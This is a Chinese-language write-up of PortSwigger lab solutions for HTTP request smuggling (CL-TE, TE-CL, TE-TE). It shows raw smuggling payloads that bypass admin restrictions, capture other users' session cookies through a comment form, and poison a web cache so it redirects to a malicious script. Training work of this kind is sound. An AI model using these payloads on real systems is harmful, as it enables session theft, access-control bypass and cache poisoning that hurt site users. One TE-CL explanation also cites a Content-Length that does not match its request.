HTTP Smuggling

前后端服务器对于HTTP请求处理的差异造成的HTTP走私

Basic For HTTP Smuggling

CL-TE

https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

• 前端服务器优先处理Content-Length
• 后端服务器优先处理Transfer-Encoding

POST / HTTP/1.1
Host: lab_id.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

• 前端服务器优先处理Content-Length: 6，内容为"0\r\n\r\nG"
• 后端服务器优先处理Transfer-Encoding: chunked，认为收到了一个大小为0的数据块，从而忽视了最后的G

这个G则留在缓冲区内，当下一次HTTP请求发出时，会加在HTTP请求之前
如果将这个数据包重新发一次，就能得到GPOST / HTTP/1.1

TE-CL

https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl

• 前端服务器优先处理Content-Length
• 后端服务器优先处理Transfer-Encoding

POST / HTTP/1.1
Host: lab_id.web-security-academy.net
Connection: close
Transfer-Encoding: chunked
Content-Length: 4
Content-Type: application/x-www-form-urlencoded

97
GPOST / HTTP/1.1
Host: lab_id.web-security-academy.net
Content-Length: 5
Content-Type: application/x-www-form-urlencoded

0

• 前端服务器优先处理Transfer-Encoding: chunked，认为收到了两个数据块，第一个数据块大小为0x97，第二个数据块大小为0x00（即标识后续无数据）
• 后端服务器优先处理Content-Length: 6，认为收到了两个HTTP请求，第一个请求内容为97，第二个请求内容为0\r\n\r\n

而第二个请求在解析时，请求方式为GPOST，即完成了HTTP Smuggling

TE-TE

https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header

• 前端服务器优先处理一个Transfer-Encoding
• 后端服务器优先处理另一个Transfer-Encoding

POST / HTTP/1.1
Host: lab_id.web-security-academy.net
Connection: close
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Transfer-Encoding: xXxYOLOxXx

97
GPOST / HTTP/1.1
Host: lab_id.web-security-academy.net
Content-Length: 5
Content-Type: application/x-www-form-urlencoded

0

• 前端服务器优先处理第一个TE，Transfer-Encoding: chunked，认为收到了两个数据块，第一个数据块大小为0x97，第二个数据块大小为0x00（即标识后续无数据）
• 后端服务器优先处理第二个TE，Transfer-Encoding: xXxYOLOxXx，无法识别，则根据CL来识别HTTP请求报文

POST / HTTP/1.1
Host: lab_id.web-security-academy.net
Connection: close
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Transfer-Encoding: xXxYOLOxXx

97

GPOST / HTTP/1.1
Host: lab_id.web-security-academy.net
Content-Length: 5
Content-Type: application/x-www-form-urlencoded

0

则第二个请求在被解析时，请求方式为GPOST，即完成了HTTP Smuggling

---

POC For HTTP Smuggling

响应404即可验证HTTP走私漏洞存在

CL-TE

https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-cl-te-via-differential-responses

POST / HTTP/1.1
Host: lab_id.web-security-academy.net
Connection: close
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

0

POST /404 HTTP/1.1
Foo: 

TE-CL

https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-te-cl-via-differential-responses

POST / HTTP/1.1
Host: lab_id.web-security-academy.net
Connection: close
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

14
POST /404 HTTP/1.1

0

---

Exploit For HTTP Smuggling

Reveal Front-End Request Rewriting

https://portswigger.net/web-security/request-smuggling/exploiting/lab-reveal-front-end-request-rewriting

前端通过一个特殊的未知HTTP头部来给后端传递客户端的IP地址
而后端仅允许admin或本地访问/admin，则需要获取前端所发送的HTTP请求

POST / HTTP/1.1
Host: id_lab.web-security-academy.net
Connection: close
Content-Length: 155
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

search=test

CL-TE漏洞环境，通过search参数值的回显可以将前端所发送的HTTP请求显示出来

0 search results for 'test
Content-Type: application/x-www-form-urlencodedPOST / HTTP/1.1
X-pSjyEZ-Ip: XXX.XX.X.XXX
Host: id_lab.web-security-academy.net
Content-Length: 155
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Content-'

则得到了所需的HTTP头
在进行一次HTTP走私来访问/admin

POST / HTTP/1.1
Host: id_lab.web-security-academy.net
Connection: close
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
X-pSjyEZ-Ip: 127.0.0.1
Foo: 

Capture Other Users’ Requests

https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests

可以借助留言板功能进行HTTP走私，将其他用户的HTTP请求附加与content参数之后
从而在留言板中得到其他用户的Cookie

POST /404 HTTP/1.1
Host: lab_id.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Cookie: session=f8dQDONY1p4VwPnH76xODdySj5jZGrKS

csrf=r7He01UCO2us28da01WI0w4rnpqlRV9b&postId=3&name=a&email=a@a.a&website=http%3a%2f%2fa.a&comment=

GET / HTTP/1.1
Host: lab_id.web-security-academy.net
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Chrome/227864
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Cookie: victim-fingerprint=40HHLq56Pi4ugFHmfdEqHXxe0c7yA09V; secret=HmzO1WU86wcpZ0NDNfCDisKJTQBarFWp; session=DMRf2fxBwIJh8CzkJGAfwnUjdIFxq5G7

Web Cache Poisoning

https://portswigger.net/web-security/request-smuggling/exploiting/lab-perform-web-cache-poisoning

需要对目标服务器进行缓存投毒
给出了一台exp服务器，用于存放恶意js文件

POST /resources/js/tracking.js HTTP/1.1
Host: lab_id.web-security-academy.net
Content-Length: 177
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

0

GET /post/next?postId=7 HTTP/1.1
Host: exp_id.web-security-academy.net
Content-Length: 3
Content-Type: application/x-www-form-urlencoded

1=1

这里需要使用站点中的302跳转来进行投毒，跳转过程有些难以理解，个人理解如下

1. HTTP走私的URL /post/next?postId=2 会请求lab服务器而不是exp服务器，从而触发跳转
2. 触发跳转的过程中，服务器读取Host头，得到exp服务器的主机名
3. 将exp的主机名与跳转目标的路径进行拼接，得到了跳转目标的URL
4. 跳转至恶意JS文件

---

参考链接:

• https://blog.csdn.net/lblblblblzdx/article/details/80386693
• https://paper.seebug.org/1048/
• https://xz.aliyun.com/t/6878